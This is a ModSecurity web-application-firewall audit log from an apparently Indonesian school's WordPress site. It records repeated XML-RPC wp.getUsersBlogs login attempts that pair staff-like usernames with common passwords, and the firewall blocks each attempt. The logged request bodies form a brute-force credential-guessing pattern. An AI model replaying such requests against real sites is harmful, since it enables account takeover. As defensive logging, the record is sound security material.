Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d2e8d42-Z-- --a2848844-A-- [24/Apr/2025:23:41:15 +0700] aAppq95yz20UX9VrdZO8CAAAAE4 103.236.140.4 49122 103.236.140.4 8181 --a2848844-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a2848844-C-- wp.getUsersBlogs wakakur passw --a2848844-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a2848844-E-- --a2848844-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (94+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512875504207 5199 (- - -) Stopwatch2: 1745512875504207 5199; combined=3561, p1=397, p2=2993, p3=0, p4=0, p5=98, sr=73, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a2848844-Z-- --9ab75457-A-- [24/Apr/2025:23:41:32 +0700] aAppvMlQo524fhbIj1x4NwAAAAk 103.236.140.4 50170 103.236.140.4 8181 --9ab75457-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9ab75457-C-- wp.getUsersBlogs wakakur 1234%^&* --9ab75457-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ab75457-E-- --9ab75457-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512892452220 4668 (- - -) Stopwatch2: 1745512892452220 4668; combined=3173, p1=384, p2=2631, p3=0, p4=0, p5=96, sr=79, sw=62, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ab75457-Z-- --13966911-A-- [24/Apr/2025:23:42:15 +0700] aApp5_iVYlyO1xhz7yOkbQAAAMI 103.236.140.4 52956 103.236.140.4 8181 --13966911-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --13966911-C-- wp.getUsersBlogs wakakur chelsea --13966911-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13966911-E-- --13966911-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (121+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512935022781 3769 (- - -) Stopwatch2: 1745512935022781 3769; combined=2579, p1=331, p2=2080, p3=0, p4=0, p5=95, sr=61, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13966911-Z-- --34989a02-A-- [24/Apr/2025:23:43:15 +0700] aApqI_iVYlyO1xhz7yOlYgAAAMk 103.236.140.4 56906 103.236.140.4 8181 --34989a02-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --34989a02-C-- wp.getUsersBlogs wakakur 20100728 --34989a02-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --34989a02-E-- --34989a02-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (116+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512995555345 5483 (- - -) Stopwatch2: 1745512995555345 5483; combined=3813, p1=412, p2=3200, p3=0, p4=0, p5=115, sr=83, sw=86, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --34989a02-Z-- --31a9e97a-A-- [24/Apr/2025:23:44:15 +0700] aApqX8lQo524fhbIj1x7hwAAAAk 103.236.140.4 60418 103.236.140.4 8181 --31a9e97a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --31a9e97a-C-- wp.getUsersBlogs wakakur cowboys --31a9e97a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --31a9e97a-E-- --31a9e97a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (72+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513055354716 4121 (- - -) Stopwatch2: 1745513055354716 4121; combined=2957, p1=369, p2=2446, p3=0, p4=0, p5=84, sr=70, sw=58, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31a9e97a-Z-- --c24ea707-A-- [24/Apr/2025:23:45:15 +0700] aApqm2Luk3f9kLjsdTZ6YgAAAIE 103.236.140.4 36104 103.236.140.4 8181 --c24ea707-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c24ea707-C-- wp.getUsersBlogs wakakur nikita --c24ea707-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c24ea707-E-- --c24ea707-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (117+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513115795144 5144 (- - -) Stopwatch2: 1745513115795144 5144; combined=3858, p1=467, p2=3191, p3=0, p4=0, p5=115, sr=88, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c24ea707-Z-- --cf365027-A-- [24/Apr/2025:23:46:16 +0700] aApq2PiVYlyO1xhz7yOoeAAAAMk 103.236.140.4 39892 103.236.140.4 8181 --cf365027-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 238 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --cf365027-C-- wp.getUsersBlogs wakahumas wordpress_administrator --cf365027-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf365027-E-- --cf365027-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (123+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513176014219 5906 (- - -) Stopwatch2: 1745513176014219 5906; combined=4465, p1=578, p2=3686, p3=0, p4=0, p5=116, sr=152, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf365027-Z-- --f046da29-A-- [24/Apr/2025:23:47:17 +0700] aAprFclQo524fhbIj1x_TwAAAAc 103.236.140.4 43866 103.236.140.4 8181 --f046da29-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f046da29-C-- wp.getUsersBlogs wakahumas marketing2010_ --f046da29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f046da29-E-- --f046da29-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (57+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513237067267 4613 (- - -) Stopwatch2: 1745513237067267 4613; combined=3523, p1=446, p2=2917, p3=0, p4=0, p5=93, sr=91, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f046da29-Z-- --e1e95348-A-- [24/Apr/2025:23:48:18 +0700] aAprUslQo524fhbIj1yAhQAAAAQ 103.236.140.4 46828 103.236.140.4 8181 --e1e95348-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e1e95348-C-- wp.getUsersBlogs wakahumas admin123456 --e1e95348-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1e95348-E-- --e1e95348-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (116+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513298159386 4753 (- - -) Stopwatch2: 1745513298159386 4753; combined=3699, p1=433, p2=3085, p3=0, p4=0, p5=105, sr=87, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1e95348-Z-- --caef6516-A-- [24/Apr/2025:23:49:18 +0700] aAprjslQo524fhbIj1yBuAAAAAc 103.236.140.4 49370 103.236.140.4 8181 --caef6516-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --caef6516-C-- wp.getUsersBlogs wakahumas 1qaz@2wsx --caef6516-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --caef6516-E-- --caef6516-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (122+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513358375551 17458 (- - -) Stopwatch2: 1745513358375551 17458; combined=28556, p1=449, p2=3084, p3=0, p4=0, p5=12526, sr=92, sw=80, l=0, gc=12417 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --caef6516-Z-- --bebcfc14-A-- [24/Apr/2025:23:50:23 +0700] aAprz8lQo524fhbIj1yCgwAAAAI 103.236.140.4 52192 103.236.140.4 8181 --bebcfc14-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --bebcfc14-C-- wp.getUsersBlogs wakahumas qqq --bebcfc14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bebcfc14-E-- --bebcfc14-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (107+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513423792924 4986 (- - -) Stopwatch2: 1745513423792924 4986; combined=3608, p1=496, p2=2952, p3=0, p4=0, p5=94, sr=95, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bebcfc14-Z-- --7827ed77-A-- [24/Apr/2025:23:51:03 +0700] aApr98lQo524fhbIj1yDCgAAAAQ 103.236.140.4 53970 103.236.140.4 8181 --7827ed77-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7827ed77-C-- wp.getUsersBlogs wakahumas 1234%^&* --7827ed77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7827ed77-E-- --7827ed77-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513463917559 5216 (- - -) Stopwatch2: 1745513463917559 5216; combined=3724, p1=447, p2=3107, p3=0, p4=0, p5=101, sr=87, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7827ed77-Z-- --e0002e74-A-- [24/Apr/2025:23:51:23 +0700] aApsC8lQo524fhbIj1yDMQAAAAQ 103.236.140.4 54822 103.236.140.4 8181 --e0002e74-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e0002e74-C-- wp.getUsersBlogs wakahumas ashley --e0002e74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0002e74-E-- --e0002e74-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (120+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513483369646 4562 (- - -) Stopwatch2: 1745513483369646 4562; combined=3233, p1=394, p2=2695, p3=0, p4=0, p5=84, sr=73, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0002e74-Z-- --617f870e-A-- [24/Apr/2025:23:52:23 +0700] aApsR_iVYlyO1xhz7yOsPQAAAM4 103.236.140.4 57540 103.236.140.4 8181 --617f870e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --617f870e-C-- wp.getUsersBlogs wakahumas joseph --617f870e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --617f870e-E-- --617f870e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (137+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513543307729 4642 (- - -) Stopwatch2: 1745513543307729 4642; combined=3247, p1=407, p2=2682, p3=0, p4=0, p5=92, sr=82, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --617f870e-Z-- --e4b4d13f-A-- [24/Apr/2025:23:53:23 +0700] aApsg_iVYlyO1xhz7yOs7wAAAMM 103.236.140.4 59954 103.236.140.4 8181 --e4b4d13f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e4b4d13f-C-- wp.getUsersBlogs wakahumas celtic --e4b4d13f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4b4d13f-E-- --e4b4d13f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (131+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513603343515 5240 (- - -) Stopwatch2: 1745513603343515 5240; combined=3573, p1=419, p2=2973, p3=0, p4=0, p5=105, sr=91, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4b4d13f-Z-- --46e5be12-A-- [24/Apr/2025:23:54:23 +0700] aApsv95yz20UX9VrdZPFaQAAAFU 103.236.140.4 34306 103.236.140.4 8181 --46e5be12-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --46e5be12-C-- wp.getUsersBlogs wakasarpras Admin123 --46e5be12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --46e5be12-E-- --46e5be12-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (127+1 hits since last 